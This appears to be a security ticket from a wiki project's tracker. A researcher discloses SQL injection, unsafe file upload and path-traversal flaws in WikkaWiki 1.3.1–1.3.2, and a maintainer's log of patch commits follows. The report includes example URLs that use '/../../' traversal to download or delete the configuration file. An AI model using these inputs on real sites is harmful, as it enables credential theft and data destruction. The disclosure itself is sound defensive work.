Multiple Security Vulnerabilities

[EgiX]

Hi, I've found some security flaws affecting the version 1.3.1 and 1.3.2.

The first is a SQL Injection here:

http://wush.net/trac/wikka/browser/trunk/actions/usersettings/usersettings.php#L136

When handling 'update' action, 'default_comment_display' is the only parameter that isn't sanitized with mysql_real_escape_string(), this can be exploited to inject arbitrary SQL code. Because of this is a multiple lines query and latest version of MySQL doesn't allow to start comment with /* no followed by a */, sometimes It's impossible to alter the 'users' table content for e.g. changing the admin's password, but is still possible to inject a subquery for fetch for e.g. the session id of admin for a Session Hijacking attack.

The second is an Arbitrary File Upload here:

http://wush.net/trac/wikka/browser/trunk/actions/files/files.php#L266

If 'INTRANET_MODE' is explicitly enabled or if an attacker conduct a successful Session Hijacking attack using the first vulnerability, It's possible to upload files that contains multiple extensions due to insufficient input sanitization at line 276. Now look at $allowed_extensions variable definition:

'gif|jpeg|jpg|jpe|png|doc|xls|csv|ppt|ppz|pps|pot|pdf|asc|txt|zip|gtar|gz|bz2|tar|rar|vpp|mpp|vsd|mm|htm|html'

It contains some extensions (e.g. mm, vpp...) that are rare to see in a MIME type Apache configuration setting. This could lead to execute arbitrary PHP code.

The last are Arbitrary File Download and Arbitrary File Deletion here:

http://wush.net/trac/wikka/browser/trunk/handlers/files.xml/files.xml.php#L53

The only input sanitization of the supplied filename is done at line 54, It checks if the filename start with a dot, if not filename is accepted. But an attacker could request an URL like this:

 http://localhost/wikka/test/files.xml?action=download&file=/../../wikka.config.php

to download for e.g. the config file (note that 'test' is a page containing the {{files}} action, but attachments aren't required for download or delete arbitrary files).

Similarly, if an attacker conduct a successful Session Hijacking attack, he could request an URL like this to delete arbitrary files:

 http://localhost/wikka/test?action=delete&file=/../../wikka.config.php

Regards,

EgiX

Related tickets

#1098 RCE and CSRF vulnerabilities

[BrianKoontz]

(In [1820]) All user input now sanitized. Refs #1097.

[BrianKoontz]

(In [1821]) Fixed issue that permitted files to be downloaded/deleted outside of the upload path. Refs #1097.

[BrianKoontz]

(In [1822]) Prevent uploading of files with multiple extensions. Refs #1097.

[BrianKoontz]

(In [1823]) Backported security patches #1097 and #1098 from trunk to 1.3.2-p1. Refs #1097, #1098, #1104.

[BrianKoontz]

(In [1826]) Backported to 1.3.2-p2. Refs #1097, #1098, #1104.

[BrianKoontz]

(In [1828]) Prohibited windows-style backslashed from filenames. Refs #1097.

[BrianKoontz]

(In [1829]) Backported to 1.3.2-p3. Refs #1097, #1098, #1104.

[BrianKoontz]

(In [1830]) Backported to 1.3.2p3. Refs #1097, #1098, #1104.

[BrianKoontz]

(In [1832]) Using tokens to validate form submissions to prevent CSRF attacks. Refs #1097.

[BrianKoontz]

(In [1833]) Sanitized file input to disallow pathname chars and variants. Refs #1097.

[BrianKoontz]

(In [1834]) Backported to 1.3.2p4. Refs #1097, #1098, #1104.

[BrianKoontz]

(In [1838]) Backported to 1.3.2-p6. Refs #1097, #1098, #1104.

[BrianKoontz]

(In [1840]) Backported to 1.3.2-p7. Refs #1097, #1098, #1104.